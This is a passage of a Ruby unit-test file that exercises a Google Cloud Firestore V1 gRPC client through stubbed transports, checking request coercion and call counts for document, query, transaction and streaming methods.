assert_equal true, request["show_missing"]
refute_nil options
end
Gapic::ServiceStub.stub :new, list_documents_client_stub do
# Create client
client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.list_documents({ parent: parent, collection_id: collection_id, page_size: page_size, page_token: page_token, order_by: order_by, mask: mask, transaction: transaction, show_missing: show_missing }) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use named arguments
client.list_documents parent: parent, collection_id: collection_id, page_size: page_size, page_token: page_token, order_by: order_by, mask: mask, transaction: transaction, show_missing: show_missing do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.list_documents ::Google::Cloud::Firestore::V1::ListDocumentsRequest.new(parent: parent, collection_id: collection_id, page_size: page_size, page_token: page_token, order_by: order_by, mask: mask, transaction: transaction, show_missing: show_missing) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.list_documents({ parent: parent, collection_id: collection_id, page_size: page_size, page_token: page_token, order_by: order_by, mask: mask, transaction: transaction, show_missing: show_missing }, grpc_options) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.list_documents ::Google::Cloud::Firestore::V1::ListDocumentsRequest.new(parent: parent, collection_id: collection_id, page_size: page_size, page_token: page_token, order_by: order_by, mask: mask, transaction: transaction, show_missing: show_missing), grpc_options do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, list_documents_client_stub.call_rpc_count
end
end
# Exercises Firestore::Client#update_document across the five supported
# invocation forms: hash, named arguments, protobuf request, and the two
# forms that additionally pass explicit call options.
def test_update_document
  # Canned GRPC-layer objects returned by the stubbed transport.
  grpc_response = ::Google::Cloud::Firestore::V1::Document.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation below.
  document = {}
  update_mask = {}
  mask = {}
  current_document = {}

  # Stub transport: verifies the coerced request and counts each RPC.
  update_document_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
    assert_equal :update_document, name
    assert_kind_of ::Google::Cloud::Firestore::V1::UpdateDocumentRequest, request
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::Document), request["document"]
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::DocumentMask), request["update_mask"]
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::DocumentMask), request["mask"]
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::Precondition), request["current_document"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, update_document_client_stub do
    client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Every call form must surface the same canned response/operation.
    verify = lambda do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Builds a fresh protobuf request per call, mirroring inline construction.
    new_request = lambda do
      ::Google::Cloud::Firestore::V1::UpdateDocumentRequest.new document: document, update_mask: update_mask, mask: mask, current_document: current_document
    end

    # Hash object
    client.update_document({ document: document, update_mask: update_mask, mask: mask, current_document: current_document }, &verify)
    # Named arguments
    client.update_document document: document, update_mask: update_mask, mask: mask, current_document: current_document, &verify
    # Protobuf object
    client.update_document new_request.call, &verify
    # Hash object with options
    client.update_document({ document: document, update_mask: update_mask, mask: mask, current_document: current_document }, grpc_options, &verify)
    # Protobuf object with options
    client.update_document new_request.call, grpc_options, &verify

    # All five invocations must have reached the transport.
    assert_equal 5, update_document_client_stub.call_rpc_count
  end
end
# Exercises Firestore::Client#delete_document across the five supported
# invocation forms: hash, named arguments, protobuf request, and the two
# forms that additionally pass explicit call options.
def test_delete_document
  # Canned GRPC-layer objects returned by the stubbed transport.
  grpc_response = ::Google::Protobuf::Empty.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation below. Named
  # +document_name+ to avoid shadowing the stub block's +name+ parameter.
  document_name = "hello world"
  current_document = {}

  # Stub transport: verifies the coerced request and counts each RPC.
  delete_document_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
    assert_equal :delete_document, name
    assert_kind_of ::Google::Cloud::Firestore::V1::DeleteDocumentRequest, request
    assert_equal "hello world", request["name"]
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::Precondition), request["current_document"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, delete_document_client_stub do
    client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Every call form must surface the same canned response/operation.
    verify = lambda do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Builds a fresh protobuf request per call, mirroring inline construction.
    new_request = lambda do
      ::Google::Cloud::Firestore::V1::DeleteDocumentRequest.new name: document_name, current_document: current_document
    end

    # Hash object
    client.delete_document({ name: document_name, current_document: current_document }, &verify)
    # Named arguments
    client.delete_document name: document_name, current_document: current_document, &verify
    # Protobuf object
    client.delete_document new_request.call, &verify
    # Hash object with options
    client.delete_document({ name: document_name, current_document: current_document }, grpc_options, &verify)
    # Protobuf object with options
    client.delete_document new_request.call, grpc_options, &verify

    # All five invocations must have reached the transport.
    assert_equal 5, delete_document_client_stub.call_rpc_count
  end
end
# Exercises Firestore::Client#batch_get_documents (server streaming) across
# the five supported invocation forms. Each call must yield an Enumerable of
# BatchGetDocumentsResponse messages plus the canned operation.
def test_batch_get_documents
  # Canned GRPC-layer objects returned by the stubbed transport.
  grpc_response = ::Google::Cloud::Firestore::V1::BatchGetDocumentsResponse.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation below.
  database = "hello world"
  documents = ["hello world"]
  mask = {}
  transaction = "hello world"

  # Stub transport: verifies the coerced request (including the oneof
  # selector) and counts each RPC. Response is a one-element stream.
  batch_get_documents_client_stub = ClientStub.new [grpc_response].to_enum, grpc_operation do |name, request, options:|
    assert_equal :batch_get_documents, name
    assert_kind_of ::Google::Cloud::Firestore::V1::BatchGetDocumentsRequest, request
    assert_equal "hello world", request["database"]
    assert_equal ["hello world"], request["documents"]
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::DocumentMask), request["mask"]
    assert_equal "hello world", request["transaction"]
    assert_equal :transaction, request.consistency_selector
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, batch_get_documents_client_stub do
    client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Every call form must stream back the canned response.
    verify = lambda do |response, operation|
      assert_kind_of Enumerable, response
      response.to_a.each do |r|
        assert_kind_of ::Google::Cloud::Firestore::V1::BatchGetDocumentsResponse, r
      end
      assert_equal grpc_operation, operation
    end

    # Builds a fresh protobuf request per call, mirroring inline construction.
    new_request = lambda do
      ::Google::Cloud::Firestore::V1::BatchGetDocumentsRequest.new database: database, documents: documents, mask: mask, transaction: transaction
    end

    # Hash object
    client.batch_get_documents({ database: database, documents: documents, mask: mask, transaction: transaction }, &verify)
    # Named arguments
    client.batch_get_documents database: database, documents: documents, mask: mask, transaction: transaction, &verify
    # Protobuf object
    client.batch_get_documents new_request.call, &verify
    # Hash object with options
    client.batch_get_documents({ database: database, documents: documents, mask: mask, transaction: transaction }, grpc_options, &verify)
    # Protobuf object with options
    client.batch_get_documents new_request.call, grpc_options, &verify

    # All five invocations must have reached the transport.
    assert_equal 5, batch_get_documents_client_stub.call_rpc_count
  end
end
# Exercises Firestore::Client#begin_transaction across the five supported
# invocation forms: hash, named arguments, protobuf request, and the two
# forms that additionally pass explicit call options.
def test_begin_transaction
  # Canned GRPC-layer objects returned by the stubbed transport.
  grpc_response = ::Google::Cloud::Firestore::V1::BeginTransactionResponse.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation below. Named
  # +txn_options+ to avoid shadowing the stub block's +options+ keyword.
  database = "hello world"
  txn_options = {}

  # Stub transport: verifies the coerced request and counts each RPC.
  begin_transaction_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
    assert_equal :begin_transaction, name
    assert_kind_of ::Google::Cloud::Firestore::V1::BeginTransactionRequest, request
    assert_equal "hello world", request["database"]
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::TransactionOptions), request["options"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, begin_transaction_client_stub do
    client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Every call form must surface the same canned response/operation.
    verify = lambda do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Builds a fresh protobuf request per call, mirroring inline construction.
    new_request = lambda do
      ::Google::Cloud::Firestore::V1::BeginTransactionRequest.new database: database, options: txn_options
    end

    # Hash object
    client.begin_transaction({ database: database, options: txn_options }, &verify)
    # Named arguments
    client.begin_transaction database: database, options: txn_options, &verify
    # Protobuf object
    client.begin_transaction new_request.call, &verify
    # Hash object with options
    client.begin_transaction({ database: database, options: txn_options }, grpc_options, &verify)
    # Protobuf object with options
    client.begin_transaction new_request.call, grpc_options, &verify

    # All five invocations must have reached the transport.
    assert_equal 5, begin_transaction_client_stub.call_rpc_count
  end
end
# Exercises Firestore::Client#commit across the five supported invocation
# forms: hash, named arguments, protobuf request, and the two forms that
# additionally pass explicit call options.
def test_commit
  # Canned GRPC-layer objects returned by the stubbed transport.
  grpc_response = ::Google::Cloud::Firestore::V1::CommitResponse.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation below.
  database = "hello world"
  writes = [{}]
  transaction = "hello world"

  # Stub transport: verifies the coerced request (hash writes must have been
  # coerced to Write messages) and counts each RPC.
  commit_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
    assert_equal :commit, name
    assert_kind_of ::Google::Cloud::Firestore::V1::CommitRequest, request
    assert_equal "hello world", request["database"]
    assert_kind_of ::Google::Cloud::Firestore::V1::Write, request["writes"].first
    assert_equal "hello world", request["transaction"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, commit_client_stub do
    client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Every call form must surface the same canned response/operation.
    verify = lambda do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Builds a fresh protobuf request per call, mirroring inline construction.
    new_request = lambda do
      ::Google::Cloud::Firestore::V1::CommitRequest.new database: database, writes: writes, transaction: transaction
    end

    # Hash object
    client.commit({ database: database, writes: writes, transaction: transaction }, &verify)
    # Named arguments
    client.commit database: database, writes: writes, transaction: transaction, &verify
    # Protobuf object
    client.commit new_request.call, &verify
    # Hash object with options
    client.commit({ database: database, writes: writes, transaction: transaction }, grpc_options, &verify)
    # Protobuf object with options
    client.commit new_request.call, grpc_options, &verify

    # All five invocations must have reached the transport.
    assert_equal 5, commit_client_stub.call_rpc_count
  end
end
# Exercises Firestore::Client#rollback across the five supported invocation
# forms: hash, named arguments, protobuf request, and the two forms that
# additionally pass explicit call options.
def test_rollback
  # Canned GRPC-layer objects returned by the stubbed transport.
  grpc_response = ::Google::Protobuf::Empty.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation below.
  database = "hello world"
  transaction = "hello world"

  # Stub transport: verifies the coerced request and counts each RPC.
  rollback_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
    assert_equal :rollback, name
    assert_kind_of ::Google::Cloud::Firestore::V1::RollbackRequest, request
    assert_equal "hello world", request["database"]
    assert_equal "hello world", request["transaction"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, rollback_client_stub do
    client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Every call form must surface the same canned response/operation.
    verify = lambda do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Builds a fresh protobuf request per call, mirroring inline construction.
    new_request = lambda do
      ::Google::Cloud::Firestore::V1::RollbackRequest.new database: database, transaction: transaction
    end

    # Hash object
    client.rollback({ database: database, transaction: transaction }, &verify)
    # Named arguments
    client.rollback database: database, transaction: transaction, &verify
    # Protobuf object
    client.rollback new_request.call, &verify
    # Hash object with options
    client.rollback({ database: database, transaction: transaction }, grpc_options, &verify)
    # Protobuf object with options
    client.rollback new_request.call, grpc_options, &verify

    # All five invocations must have reached the transport.
    assert_equal 5, rollback_client_stub.call_rpc_count
  end
end
# Exercises Firestore::Client#run_query (server streaming) across the five
# supported invocation forms. Each call must yield an Enumerable of
# RunQueryResponse messages plus the canned operation.
def test_run_query
  # Canned GRPC-layer objects returned by the stubbed transport.
  grpc_response = ::Google::Cloud::Firestore::V1::RunQueryResponse.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation below.
  parent = "hello world"
  structured_query = {}
  transaction = "hello world"

  # Stub transport: verifies the coerced request, including both oneof
  # selectors (query_type and consistency_selector), and counts each RPC.
  run_query_client_stub = ClientStub.new [grpc_response].to_enum, grpc_operation do |name, request, options:|
    assert_equal :run_query, name
    assert_kind_of ::Google::Cloud::Firestore::V1::RunQueryRequest, request
    assert_equal "hello world", request["parent"]
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::StructuredQuery), request["structured_query"]
    assert_equal :structured_query, request.query_type
    assert_equal "hello world", request["transaction"]
    assert_equal :transaction, request.consistency_selector
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, run_query_client_stub do
    client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Every call form must stream back the canned response.
    verify = lambda do |response, operation|
      assert_kind_of Enumerable, response
      response.to_a.each do |r|
        assert_kind_of ::Google::Cloud::Firestore::V1::RunQueryResponse, r
      end
      assert_equal grpc_operation, operation
    end

    # Builds a fresh protobuf request per call, mirroring inline construction.
    new_request = lambda do
      ::Google::Cloud::Firestore::V1::RunQueryRequest.new parent: parent, structured_query: structured_query, transaction: transaction
    end

    # Hash object
    client.run_query({ parent: parent, structured_query: structured_query, transaction: transaction }, &verify)
    # Named arguments
    client.run_query parent: parent, structured_query: structured_query, transaction: transaction, &verify
    # Protobuf object
    client.run_query new_request.call, &verify
    # Hash object with options
    client.run_query({ parent: parent, structured_query: structured_query, transaction: transaction }, grpc_options, &verify)
    # Protobuf object with options
    client.run_query new_request.call, grpc_options, &verify

    # All five invocations must have reached the transport.
    assert_equal 5, run_query_client_stub.call_rpc_count
  end
end
# Exercises Firestore::Client#partition_query (paged) across the five
# supported invocation forms. Each call must yield a Gapic::PagedEnumerable
# wrapping the canned response.
def test_partition_query
  # Canned GRPC-layer objects returned by the stubbed transport.
  grpc_response = ::Google::Cloud::Firestore::V1::PartitionQueryResponse.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation below.
  parent = "hello world"
  structured_query = {}
  partition_count = 42
  page_token = "hello world"
  page_size = 42

  # Stub transport: verifies the coerced request (including the query_type
  # oneof selector) and counts each RPC.
  partition_query_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
    assert_equal :partition_query, name
    assert_kind_of ::Google::Cloud::Firestore::V1::PartitionQueryRequest, request
    assert_equal "hello world", request["parent"]
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::StructuredQuery), request["structured_query"]
    assert_equal :structured_query, request.query_type
    assert_equal 42, request["partition_count"]
    assert_equal "hello world", request["page_token"]
    assert_equal 42, request["page_size"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, partition_query_client_stub do
    client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Every call form must wrap the canned response in a paged enumerable.
    verify = lambda do |response, operation|
      assert_kind_of Gapic::PagedEnumerable, response
      assert_equal grpc_response, response.response
      assert_equal grpc_operation, operation
    end

    # Builds a fresh protobuf request per call, mirroring inline construction.
    new_request = lambda do
      ::Google::Cloud::Firestore::V1::PartitionQueryRequest.new parent: parent, structured_query: structured_query, partition_count: partition_count, page_token: page_token, page_size: page_size
    end

    # Hash object
    client.partition_query({ parent: parent, structured_query: structured_query, partition_count: partition_count, page_token: page_token, page_size: page_size }, &verify)
    # Named arguments
    client.partition_query parent: parent, structured_query: structured_query, partition_count: partition_count, page_token: page_token, page_size: page_size, &verify
    # Protobuf object
    client.partition_query new_request.call, &verify
    # Hash object with options
    client.partition_query({ parent: parent, structured_query: structured_query, partition_count: partition_count, page_token: page_token, page_size: page_size }, grpc_options, &verify)
    # Protobuf object with options
    client.partition_query new_request.call, grpc_options, &verify

    # All five invocations must have reached the transport.
    assert_equal 5, partition_query_client_stub.call_rpc_count
  end
end
# Exercises Firestore::Client#write (bidirectional streaming) with both
# request-stream styles — a plain Enumerable and a Gapic::StreamInput —
# each with and without explicit call options (4 calls total).
def test_write
  # Create GRPC objects.
  grpc_response = ::Google::Cloud::Firestore::V1::WriteResponse.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}
  # Create request parameters for a bidi streaming method.
  database = "hello world"
  stream_id = "hello world"
  writes = [{}]
  stream_token = "hello world"
  labels = {}
  # Response is a one-element stream. The block returns +request+ so the
  # stub can record the request enumerable for inspection at the end.
  write_client_stub = ClientStub.new [grpc_response].to_enum, grpc_operation do |name, request, options:|
    assert_equal :write, name
    assert_kind_of Enumerable, request
    refute_nil options
    request
  end
  Gapic::ServiceStub.stub :new, write_client_stub do
    # Create client
    client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
      config.credentials = grpc_channel
    end
    # Use enumerable object with hash and protobuf object.
    request_hash = { database: database, stream_id: stream_id, writes: writes, stream_token: stream_token, labels: labels }
    request_proto = ::Google::Cloud::Firestore::V1::WriteRequest.new database: database, stream_id: stream_id, writes: writes, stream_token: stream_token, labels: labels
    enum_input = [request_hash, request_proto].to_enum
    client.write enum_input do |response, operation|
      assert_kind_of Enumerable, response
      response.to_a.each do |r|
        assert_kind_of ::Google::Cloud::Firestore::V1::WriteResponse, r
      end
      assert_equal grpc_operation, operation
    end
    # Use stream input object (from gapic-common).
    request_hash = { database: database, stream_id: stream_id, writes: writes, stream_token: stream_token, labels: labels }
    request_proto = ::Google::Cloud::Firestore::V1::WriteRequest.new database: database, stream_id: stream_id, writes: writes, stream_token: stream_token, labels: labels
    stream_input = Gapic::StreamInput.new
    client.write stream_input do |response, operation|
      assert_kind_of Enumerable, response
      response.to_a.each do |r|
        assert_kind_of ::Google::Cloud::Firestore::V1::WriteResponse, r
      end
      assert_equal grpc_operation, operation
    end
    # NOTE(review): requests are pushed and the stream closed AFTER the call
    # returns — presumably the stub consumes the request stream lazily;
    # confirm against ClientStub before reordering these statements.
    stream_input << request_hash
    stream_input << request_proto
    stream_input.close
    # Use enumerable object with hash and protobuf object with options.
    request_hash = { database: database, stream_id: stream_id, writes: writes, stream_token: stream_token, labels: labels }
    request_proto = ::Google::Cloud::Firestore::V1::WriteRequest.new database: database, stream_id: stream_id, writes: writes, stream_token: stream_token, labels: labels
    enum_input = [request_hash, request_proto].to_enum
    client.write enum_input, grpc_options do |response, operation|
      assert_kind_of Enumerable, response
      response.to_a.each do |r|
        assert_kind_of ::Google::Cloud::Firestore::V1::WriteResponse, r
      end
      assert_equal grpc_operation, operation
    end
    # Use stream input object (from gapic-common) with options.
    request_hash = { database: database, stream_id: stream_id, writes: writes, stream_token: stream_token, labels: labels }
    request_proto = ::Google::Cloud::Firestore::V1::WriteRequest.new database: database, stream_id: stream_id, writes: writes, stream_token: stream_token, labels: labels
    stream_input = Gapic::StreamInput.new
    client.write stream_input, grpc_options do |response, operation|
      assert_kind_of Enumerable, response
      response.to_a.each do |r|
        assert_kind_of ::Google::Cloud::Firestore::V1::WriteResponse, r
      end
      assert_equal grpc_operation, operation
    end
    stream_input << request_hash
    stream_input << request_proto
    stream_input.close
    # Verify method calls
    assert_equal 4, write_client_stub.call_rpc_count
    # Every recorded request stream must contain only fully coerced
    # WriteRequest messages with the expected field values.
    write_client_stub.requests.each do |request|
      request.to_a.each do |r|
        assert_kind_of ::Google::Cloud::Firestore::V1::WriteRequest, r
        assert_equal "hello world", r["database"]
        assert_equal "hello world", r["stream_id"]
        assert_kind_of ::Google::Cloud::Firestore::V1::Write, r["writes"].first
        assert_equal "hello world", r["stream_token"]
        assert_equal({}, r["labels"].to_h)
      end
    end
  end
end
# Exercises Firestore::Client#listen (bidirectional streaming) with both
# request-stream styles — a plain Enumerable and a Gapic::StreamInput —
# each with and without explicit call options (4 calls total).
def test_listen
  # Create GRPC objects.
  grpc_response = ::Google::Cloud::Firestore::V1::ListenResponse.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}
  # Create request parameters for a bidi streaming method.
  database = "hello world"
  add_target = {}
  labels = {}
  # Response is a one-element stream. The block returns +request+ so the
  # stub can record the request enumerable for inspection at the end.
  listen_client_stub = ClientStub.new [grpc_response].to_enum, grpc_operation do |name, request, options:|
    assert_equal :listen, name
    assert_kind_of Enumerable, request
    refute_nil options
    request
  end
  Gapic::ServiceStub.stub :new, listen_client_stub do
    # Create client
    client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
      config.credentials = grpc_channel
    end
    # Use enumerable object with hash and protobuf object.
    request_hash = { database: database, add_target: add_target, labels: labels }
    request_proto = ::Google::Cloud::Firestore::V1::ListenRequest.new database: database, add_target: add_target, labels: labels
    enum_input = [request_hash, request_proto].to_enum
    client.listen enum_input do |response, operation|
      assert_kind_of Enumerable, response
      response.to_a.each do |r|
        assert_kind_of ::Google::Cloud::Firestore::V1::ListenResponse, r
      end
      assert_equal grpc_operation, operation
    end
    # Use stream input object (from gapic-common).
    request_hash = { database: database, add_target: add_target, labels: labels }
    request_proto = ::Google::Cloud::Firestore::V1::ListenRequest.new database: database, add_target: add_target, labels: labels
    stream_input = Gapic::StreamInput.new
    client.listen stream_input do |response, operation|
      assert_kind_of Enumerable, response
      response.to_a.each do |r|
        assert_kind_of ::Google::Cloud::Firestore::V1::ListenResponse, r
      end
      assert_equal grpc_operation, operation
    end
    # NOTE(review): requests are pushed and the stream closed AFTER the call
    # returns — presumably the stub consumes the request stream lazily;
    # confirm against ClientStub before reordering these statements.
    stream_input << request_hash
    stream_input << request_proto
    stream_input.close
    # Use enumerable object with hash and protobuf object with options.
    request_hash = { database: database, add_target: add_target, labels: labels }
    request_proto = ::Google::Cloud::Firestore::V1::ListenRequest.new database: database, add_target: add_target, labels: labels
    enum_input = [request_hash, request_proto].to_enum
    client.listen enum_input, grpc_options do |response, operation|
      assert_kind_of Enumerable, response
      response.to_a.each do |r|
        assert_kind_of ::Google::Cloud::Firestore::V1::ListenResponse, r
      end
      assert_equal grpc_operation, operation
    end
    # Use stream input object (from gapic-common) with options.
    request_hash = { database: database, add_target: add_target, labels: labels }
    request_proto = ::Google::Cloud::Firestore::V1::ListenRequest.new database: database, add_target: add_target, labels: labels
    stream_input = Gapic::StreamInput.new
    client.listen stream_input, grpc_options do |response, operation|
      assert_kind_of Enumerable, response
      response.to_a.each do |r|
        assert_kind_of ::Google::Cloud::Firestore::V1::ListenResponse, r
      end
      assert_equal grpc_operation, operation
    end
    stream_input << request_hash
    stream_input << request_proto
    stream_input.close
    # Verify method calls
    assert_equal 4, listen_client_stub.call_rpc_count
    # Every recorded request stream must contain only fully coerced
    # ListenRequest messages, with the target_change oneof set to add_target.
    listen_client_stub.requests.each do |request|
      request.to_a.each do |r|
        assert_kind_of ::Google::Cloud::Firestore::V1::ListenRequest, r
        assert_equal "hello world", r["database"]
        assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::Target), r["add_target"]
        assert_equal :add_target, r.target_change
        assert_equal({}, r["labels"].to_h)
      end
    end
  end
end
# Exercises Firestore::Client#list_collection_ids across the five supported
# invocation forms: hash, named arguments, protobuf request, and the two
# forms that additionally pass explicit call options.
def test_list_collection_ids
  # Canned GRPC-layer objects returned by the stubbed transport.
  grpc_response = ::Google::Cloud::Firestore::V1::ListCollectionIdsResponse.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation below.
  parent = "hello world"
  page_size = 42
  page_token = "hello world"

  # Stub transport: verifies the coerced request and counts each RPC.
  list_collection_ids_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
    assert_equal :list_collection_ids, name
    assert_kind_of ::Google::Cloud::Firestore::V1::ListCollectionIdsRequest, request
    assert_equal "hello world", request["parent"]
    assert_equal 42, request["page_size"]
    assert_equal "hello world", request["page_token"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, list_collection_ids_client_stub do
    client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Every call form must surface the same canned response/operation.
    verify = lambda do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Builds a fresh protobuf request per call, mirroring inline construction.
    new_request = lambda do
      ::Google::Cloud::Firestore::V1::ListCollectionIdsRequest.new parent: parent, page_size: page_size, page_token: page_token
    end

    # Hash object
    client.list_collection_ids({ parent: parent, page_size: page_size, page_token: page_token }, &verify)
    # Named arguments
    client.list_collection_ids parent: parent, page_size: page_size, page_token: page_token, &verify
    # Protobuf object
    client.list_collection_ids new_request.call, &verify
    # Hash object with options
    client.list_collection_ids({ parent: parent, page_size: page_size, page_token: page_token }, grpc_options, &verify)
    # Protobuf object with options
    client.list_collection_ids new_request.call, grpc_options, &verify

    # All five invocations must have reached the transport.
    assert_equal 5, list_collection_ids_client_stub.call_rpc_count
  end
end
# Exercises Firestore::Client#batch_write across the five supported
# invocation forms: hash, named arguments, protobuf request, and the two
# forms that additionally pass explicit call options.
def test_batch_write
  # Canned GRPC-layer objects returned by the stubbed transport.
  grpc_response = ::Google::Cloud::Firestore::V1::BatchWriteResponse.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation below.
  database = "hello world"
  writes = [{}]
  labels = {}

  # Stub transport: verifies the coerced request (hash writes must have been
  # coerced to Write messages) and counts each RPC.
  batch_write_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
    assert_equal :batch_write, name
    assert_kind_of ::Google::Cloud::Firestore::V1::BatchWriteRequest, request
    assert_equal "hello world", request["database"]
    assert_kind_of ::Google::Cloud::Firestore::V1::Write, request["writes"].first
    assert_equal({}, request["labels"].to_h)
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, batch_write_client_stub do
    client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Every call form must surface the same canned response/operation.
    verify = lambda do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Builds a fresh protobuf request per call, mirroring inline construction.
    new_request = lambda do
      ::Google::Cloud::Firestore::V1::BatchWriteRequest.new database: database, writes: writes, labels: labels
    end

    # Hash object
    client.batch_write({ database: database, writes: writes, labels: labels }, &verify)
    # Named arguments
    client.batch_write database: database, writes: writes, labels: labels, &verify
    # Protobuf object
    client.batch_write new_request.call, &verify
    # Hash object with options
    client.batch_write({ database: database, writes: writes, labels: labels }, grpc_options, &verify)
    # Protobuf object with options
    client.batch_write new_request.call, grpc_options, &verify

    # All five invocations must have reached the transport.
    assert_equal 5, batch_write_client_stub.call_rpc_count
  end
end
def test_create_document
# Create GRPC objects.
grpc_response = ::Google::Cloud::Firestore::V1::Document.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
parent = "hello world"
collection_id = "hello world"
document_id = "hello world"
document = {}
mask = {}
create_document_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :create_document, name
assert_kind_of ::Google::Cloud::Firestore::V1::CreateDocumentRequest, request
assert_equal "hello world", request["parent"]
assert_equal "hello world", request["collection_id"]
